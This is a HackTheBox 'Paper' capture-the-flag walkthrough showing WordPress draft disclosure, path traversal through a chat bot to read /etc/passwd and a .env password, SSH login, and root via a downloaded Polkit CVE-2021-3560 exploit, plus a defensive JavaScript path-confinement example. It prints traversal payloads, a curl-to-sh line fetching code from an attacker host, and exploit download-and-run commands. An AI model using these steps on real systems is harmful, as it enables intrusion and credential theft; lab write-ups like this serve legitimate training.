
HackTheBox – Paper Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.143

http://10.10.11.143/

Add this domain to /etc/hosts and browse to office.paper; we can then see that this subdomain runs WordPress.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# wpscan --url http://office.paper/ --enumerate u,ap

We can see that the version is 5.2.3, and we can find a CVE for this version here: https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

So we can use:

http://office.paper/?static=1

And on the page we get this:

Now browse to this website, but remember to add it to /etc/hosts first.

http://chat.office.paper/register/8qozr226AhkCHZdyY

Register an account here and log in. After a little while, a pop-up for the general chat will appear. Now we can see that this bot uses its own commands, like this:

The bot uses this recyclops command to communicate with the localhost, but we can't talk in this chat because it is "read only", so let's message the bot privately and try to use this command.

recyclops file ../../../../etc/passwd

After that we can enumerate the users, and we will find the correct password:

recyclops file ../hubot/.env

We get the password: Queenofblad3s!23

Let's go back and check the users available on this machine using file ../../../etc/passwd; we find that [dwight] has access to [/bin/bash].

┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh dwight@10.10.11.143
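
The recyclops file ../hubot/.env request above works because the requested path is never confined to the directory the bot is meant to serve. The following is an added example, not code from this writeup or from the bot itself; the function names and the temporary sandbox layout are assumptions. It puts the naive path join beside a check that canonicalises the path first, including a symlink case that a simple filter on ../ would miss.

```javascript
// Added example; function names and the sandbox layout are hypothetical.
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Vulnerable pattern: the requested name is joined to the base directory and
// used as-is, so "../hubot/.env" walks out of the served directory.
function resolveNaive(baseDir, userPath) {
  return path.join(baseDir, userPath);
}

// Hardened: canonicalise both paths (realpath follows symlinks), then require
// the target to be a regular file below the base. Returns null when rejected.
function resolveConfined(baseDir, userPath) {
  if (typeof userPath !== 'string' || userPath.includes('\0')) return null;
  try {
    const base = fs.realpathSync(baseDir);
    const target = fs.realpathSync(path.resolve(base, userPath));
    const rel = path.relative(base, target);
    const outside = rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
    return !outside && fs.statSync(target).isFile() ? target : null;
  } catch {
    return null; // nonexistent or unreadable path: deny
  }
}

const readOrNull = (p) => { try { return p && fs.readFileSync(p, 'utf8'); } catch { return null; } };

// Constructed sandbox: <tmp>/sales is served; <tmp>/hubot/.env holds a secret;
// sales/link is a symlink that points back out to <tmp>/hubot.
function demo() {
  const root = fs.mkdtempSync(path.join(os.tmpdir(), 'botfiles-'));
  const base = path.join(root, 'sales');
  fs.mkdirSync(base);
  fs.mkdirSync(path.join(root, 'hubot'));
  fs.writeFileSync(path.join(base, 'portfolio.txt'), 'public\n');
  fs.writeFileSync(path.join(root, 'hubot', '.env'), 'PASSWORD=constructed\n');
  fs.symlinkSync(path.join(root, 'hubot'), path.join(base, 'link'));
  const out = {};
  for (const req of ['portfolio.txt', '../hubot/.env', 'link/.env']) {
    out[req] = { naive: readOrNull(resolveNaive(base, req)),
                 confined: readOrNull(resolveConfined(base, req)) };
  }
  fs.rmSync(root, { recursive: true, force: true });
  return out;
}

console.log(demo());
```

The confined resolver still returns the legitimate file, while both the ../ request and the symlink request come back as null. Keeping secrets such as the .env file readable only by an account the bot does not run as limits the damage if a check like this is ever missed.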

VERTICAL PRIVESC

Now we can notice a file in the user directory that recalls an exploit:

┌──(root㉿kali)-[/home/kali/Downloads]
└─# wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

[dwight@paper tmp]$ curl -L http://10.10.14.102:8000/linpeas.sh | sh

https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

┌──(root㉿kali)-[/home/kali/Downloads]
└─# wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

[dwight@paper tmp]$ wget http://10.10.14.102:8000/CVE-2021-3560.py

[dwight@paper tmp]$ chmod +x CVE-2021-3560.py

[dwight@paper tmp]$ python3 CVE-2021-3560.py

Hi, I’m saksham dixit
